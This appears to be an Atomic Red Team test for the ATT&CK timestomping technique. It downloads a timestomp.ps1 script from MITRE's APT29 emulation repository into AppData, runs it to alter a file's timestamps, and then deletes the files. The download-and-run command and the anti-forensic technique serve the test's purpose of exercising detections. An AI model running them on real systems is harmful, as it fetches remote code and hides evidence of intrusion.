#TechniqueName: Indicator Removal on Host: Timestomp
#AtomicTestName: Windows - Timestomp a File
#Language: ps1

#get_prereq_commands
Invoke-WebRequest "https://raw.githubusercontent.com/mitre-attack/attack-arsenal/bc0ba1d88d026396939b6816de608cb279bfd489/adversary_emulation/APT29/CALDERA_DIY/evals/payloads/timestomp.ps1" -OutFile "$env:appdata\Microsoft\timestomp.ps1"


#prereq_commands
if (Test-Path $env:appdata\Microsoft\timestomp.ps1) {exit 0} else {exit 1}


#commands
import-module $env:appdata\Microsoft\timestomp.ps1
timestomp -dest "$env:appdata\Microsoft\kxwn.lock"


#cleanup_commands
Remove-Item $env:appdata\Microsoft\timestomp.ps1 -ErrorAction Ignore
Remove-Item $env:appdata\Microsoft\kxwn.lock -ErrorAction Ignore
